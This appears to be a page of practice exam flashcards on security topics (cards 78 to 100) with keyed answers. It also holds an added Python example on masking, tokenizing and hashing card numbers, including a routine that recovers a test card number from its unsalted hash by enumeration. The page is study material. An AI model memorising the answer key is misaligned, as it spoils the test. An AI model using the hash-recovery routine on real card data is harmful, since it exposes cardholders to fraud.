An IT administrator needs to ensure data retention standards are implemented on an enterprise application. Which of the following describes the administrator’s role?

A. Processor
B. Custodian
C. Privacy officer
D. Owner
A

B. Custodian

78
Q

A company plans to secure its systems by:

  • Preventing users from sending sensitive data over corporate email
  • Restricting access to potentially harmful websites

Which of the following features should the company set up? (Choose two.)

A. DLP software
B. DNS filtering
C. File integrity monitoring
D. Stateful firewall
E. Guardrails
F. Antivirus signatures
A

A. DLP software
B. DNS filtering

79
Q

A company processes and stores sensitive data on its own systems. Which of the following steps should the company take first to ensure compliance with privacy regulations?

A. Implement access controls and encryption.
B. Develop and provide training on data protection policies.
C. Create incident response and disaster recovery plans.
D. Purchase and install security software.
A

A. Implement access controls and encryption.

80
Q

Which of the following cryptographic methods is preferred for securing communications with limited computing resources?

A. Hashing algorithm
B. Public key infrastructure
C. Symmetric encryption
D. Elliptic curve cryptography
A

C. Symmetric encryption

81
Q

A network administrator wants to ensure that network traffic is highly secure while in transit. Which of the following best describes the actions the network administrator should take?

A. Ensure that NAC is enforced on all network segments, and confirm that firewalls have updated policies to block unauthorized traffic.
B. Ensure only TLS and other encrypted protocols are selected for use on the network, and only permit authorized traffic via secure protocols.
C. Configure the perimeter IPS to block inbound HTTPS directory traversal traffic, and verify that signatures are updated on a daily basis.
D. Ensure the EDR software monitors for unauthorized applications that could be used by threat actors, and configure alerts for the security team.
A

B. Ensure only TLS and other encrypted protocols are selected for use on the network, and only permit authorized traffic via secure protocols.

82
Q

An enterprise security team is researching a new security architecture to better protect the company’s networks and applications against the latest cyberthreats. The company has a fully remote workforce. The solution should be highly redundant and enable users to connect to a VPN with an integrated, software-based firewall. Which of the following solutions meets these requirements?

A. IPS
B. SIEM
C. SASE
D. CASB
A

C. SASE

83
Q

Which of the following definitions best describes the concept of log correlation?

A. Combining relevant logs from multiple sources into one location
B. Searching and processing data to identify patterns of malicious activity
C. Making a record of the events that occur in the system
D. Analyzing the log files of the system components
A

B. Searching and processing data to identify patterns of malicious activity

84
Q

Which of the following is the best way to validate the integrity and availability of a disaster recovery site?

A. Lead a simulated failover.
B. Conduct a tabletop exercise.
C. Periodically test the generators.
D. Develop requirements for database encryption.
A

A. Lead a simulated failover.

85
Q

Which of the following allows an exploit to go undetected by the operating system?

A. Firmware vulnerabilities
B. Side loading
C. Memory injection
D. Encrypted payloads
A

C. Memory injection

86
Q

A malicious insider from the marketing team alters records and transfers company funds to a personal account. Which of the following methods would be the best way to secure company records in the future?

A. Permission restrictions
B. Hashing
C. Input validation
D. Access control list
A

A. Permission restrictions

87
Q

An organization is required to provide assurance that its controls are properly designed and operating effectively. Which of the following reports will best achieve the objective?

A. Red teaming
B. Penetration testing
C. Independent audit
D. Vulnerability assessment
A

C. Independent audit

88
Q

A systems administrator successfully configures VPN access to a cloud environment. Which of the following capabilities should the administrator use to best facilitate remote administration?

A. A jump host in the shared services security zone
B. An SSH server within the corporate LAN
C. A reverse proxy on the firewall
D. An MDM solution with conditional access
A

A. A jump host in the shared services security zone

89
Q

Which of the following best describes the concept of information being stored outside of its country of origin while still being subject to the laws and requirements of the country of origin?

A. Data sovereignty
B. Geolocation
C. Intellectual property
D. Geographic restrictions
A

A. Data sovereignty

90
Q

An audit reveals that cardholder database logs are exposing account numbers inappropriately. Which of the following mechanisms would help limit the impact of this error?

A. Segmentation
B. Hashing
C. Journaling
D. Masking
A

D. Masking

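Three cards on this page (card 9, card 28 and the one directly above) pick among masking, tokenization and hashing for card numbers, and the right answer depends on what the data is for: logs need an irreversible partial view (masking), pending purchases need a reversible reference that is useless if stolen (tokenization), and an unsalted hash of a PAN protects little because the candidate space is tiny once the BIN and last four digits are known. The script below is an added example, not code from the original page, showing all three side by side. The log line, the vault and the PAN (a Luhn-valid number built on the 411111 test prefix) are constructed.

```python
"""Masking, tokenization and hashing of card numbers, side by side.

Added example, not from the original page. The sample PAN 4111 1100 0042 8735
is constructed on the 411111 test prefix and passes the Luhn check; the log
line and the vault are constructed stand-ins."""
import hashlib
import re
import secrets

PAN_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")   # 13 to 19 digits, optional separators


def luhn_valid(digits):
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(digits):
    """Irreversible and partial: only the last four digits survive (what a log needs)."""
    return "*" * (len(digits) - 4) + digits[-4:]


def mask_log_line(line):
    """Replace every Luhn-valid card-number-looking run in a log line."""
    def repl(m):
        digits = re.sub(r"\D", "", m.group(0))
        if luhn_valid(digits):
            return mask_pan(digits)
        return m.group(0)
    return PAN_RE.sub(repl, line)


class TokenVault:
    """Stand-in for a tokenization service. The PAN exists only inside the vault;
    the application stores the token and exchanges it for the PAN at charge time."""
    def __init__(self):
        self._pan_by_token = {}
        self._token_by_pan = {}

    def tokenize(self, pan):
        if pan not in self._token_by_pan:
            token = "tok_" + secrets.token_hex(12)      # random, no relationship to the PAN
            self._token_by_pan[pan] = token
            self._pan_by_token[token] = pan
        return self._token_by_pan[pan]

    def detokenize(self, token):
        return self._pan_by_token[token]


def hash_pan(pan):
    """Deterministic and one-way, but see recover_from_hash: the PAN space is small."""
    return hashlib.sha256(pan.encode()).hexdigest()


def recover_from_hash(digest, bin6, last4):
    """Why an unsalted hash does not protect a PAN: with the BIN and the last four
    known (both routinely printed on receipts and in logs), a 16-digit PAN has
    10**6 middle values and only about 10**5 of them pass Luhn. Enumerates them
    in ascending order and stops at the first match."""
    for i in range(10 ** 6):
        candidate = f"{bin6}{i:06d}{last4}"
        if luhn_valid(candidate) and hash_pan(candidate) == digest:
            return candidate
    return None


SAMPLE_PAN = "4111110000428735"
SAMPLE_LOG_LINE = ("2023-01-28T16:32:45Z INFO order=88213 card=4111 1100 0042 8735 "
                   "status=PENDING amount=49.90")

if __name__ == "__main__":
    print(mask_log_line(SAMPLE_LOG_LINE))
    vault = TokenVault()
    token = vault.tokenize(SAMPLE_PAN)
    print(token, vault.detokenize(token) == SAMPLE_PAN)
    print(recover_from_hash(hash_pan(SAMPLE_PAN), SAMPLE_PAN[:6], SAMPLE_PAN[-4:]))
```

The Luhn filter in mask_log_line keeps order numbers and timestamps intact while catching PANs regardless of spacing; the vault shows why tokenization, not masking, fits the pending-purchases card (the data must be recoverable, but only by the vault); and recover_from_hash is the reason hashing is the wrong answer on all three cards.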
91
Q

A security analyst attempts to start a company's database server. When the server starts, the analyst receives an error message indicating the database server did not pass authentication. After reviewing and testing the system, the analyst receives confirmation that the server has been compromised and that attackers have redirected all outgoing database traffic to a server under their control. Which of the following MITRE ATT&CK techniques did the attacker most likely use to redirect database traffic?

A. Browser extension
B. Process injection
C. Valid accounts
D. Escape to host
A

C. Valid accounts

92
Q

A penetration tester enters an office building at the same time as a group of employees despite not having an access badge. Which of the following attack types is the penetration tester performing?

A. Tailgating
B. Shoulder surfing
C. RFID cloning
D. Forgery
A

A. Tailgating

93
Q

Which of the following enables the ability to receive a consolidated report from different devices on the network?

A. IPS
B. DLP
C. SIEM
D. Firewall
A

C. SIEM

94
Q

Which of the following should an organization focus on the most when making decisions about vulnerability prioritization?

A. Exposure factor
B. CVSS
C. CVE
D. Industry impact
A

B. CVSS

95
Q

An organization needs to monitor its users’ activities in order to prevent insider threats. Which of the following solutions would help the organization achieve this goal?

A. Behavioral analytics
B. Access control lists
C. Identity and access management
D. Network intrusion detection system
A

A. Behavioral analytics

96
Q

A customer of a large company receives a phone call from someone claiming to work for the company and asking for the customer’s credit card information. The customer sees the caller ID is the same as the company's main phone number. Which of the following attacks is the customer most likely a target of?

A. Phishing
B. Whaling
C. Smishing
D. Vishing
A

D. Vishing

97
Q

A security analyst is reviewing logs to identify the destination of command-and-control traffic originating from a compromised device within the on-premises network. Which of the following is the best log to review?

A. IDS
B. Antivirus
C. Firewall
D. Application
A

C. Firewall

98
Q

Which of the following would most likely be deployed to obtain and analyze attacker activity and techniques?

A. Firewall
B. IDS
C. Honeypot
D. Layer 3 switch
A

C. Honeypot

99
Q

When trying to access an internal website, an employee reports that a prompt displays, stating that the site is insecure. Which of the following certificate types is the site most likely using?

A. Wildcard
B. Root of trust
C. Third-party
D. Self-signed
A

D. Self-signed

100
Q

Which of the following objectives is best achieved by a tabletop exercise?

A. Familiarizing participants with the incident response process
B. Deciding red and blue team rules of engagement
C. Quickly determining the impact of an actual security breach
D. Conducting multiple security investigations in parallel
A

A. Familiarizing participants with the incident response process